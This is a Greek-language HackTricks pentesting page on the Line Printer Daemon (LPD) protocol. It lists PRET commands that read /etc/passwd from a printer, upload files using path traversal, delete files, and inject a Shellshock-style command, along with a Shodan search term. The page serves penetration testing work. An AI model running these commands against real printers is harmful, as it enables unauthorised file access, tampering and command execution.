hacktricks/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md
Translator workflow 35c6b081d2 Translated to Greek
2024-02-10 22:40:18 +00:00

6 KiB
Raw Blame History

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Εισαγωγή στο πρωτόκολλο LPD

Τη δεκαετία του 1980, το πρωτόκολλο Line Printer Daemon (LPD) αναπτύχθηκε στο Berkeley Unix, το οποίο αργότερα καθιερώθηκε μέσω του RFC1179. Αυτό το πρωτόκολλο λειτουργεί μέσω της θύρας 515/tcp, επιτρέποντας αλληλεπιδράσεις μέσω της εντολής lpr. Η ουσία της εκτύπωσης μέσω LPD περιλαμβάνει την αποστολή ενός αρχείου ελέγχου (για τον καθορισμό λεπτομερειών και χρήστη της εργασίας) μαζί με ένα αρχείο δεδομένων (το οποίο περιέχει τις πληροφορίες εκτύπωσης). Ενώ το αρχείο ελέγχου επιτρέπει την επιλογή διάφορων μορφών αρχείων για το αρχείο δεδομένων, η χειρισμός αυτών των αρχείων καθορίζεται από τη συγκεκριμένη υλοποίηση του LPD. Μια ευρέως αναγνωρισμένη υλοποίηση για συστήματα παρόμοια με Unix είναι το LPRng. Είναι σημαντικό να σημειωθεί ότι το πρωτόκολλο LPD μπορεί να εκμεταλλευτεί για την εκτέλεση κακόβουλων εργασιών εκτύπωσης PostScript ή PJL.

Εργαλεία για την αλληλεπίδραση με εκτυπωτές LPD

Το PRET παρουσιάζει δύο βασικά εργαλεία, το lpdprint και το lpdtest, που προσφέρουν έναν απλό τρόπο αλληλεπίδρασης με εκτυπωτές συμβατούς με το LPD. Αυτά τα εργαλεία επιτρέπουν μια σειρά ενεργειών από την εκτύπωση δεδομένων μέχρι την επεξεργασία αρχείων στον εκτυπωτή, όπως λήψη, αποστολή ή διαγραφή:

# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local

Για άτομα που ενδιαφέρονται να εξερευνήσουν περαιτέρω τον κόσμο του hacking εκτυπωτών, μια περιεκτική πηγή πληροφοριών μπορεί να βρεθεί εδώ: Hacking Printers.

Shodan

  • port 515
Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks: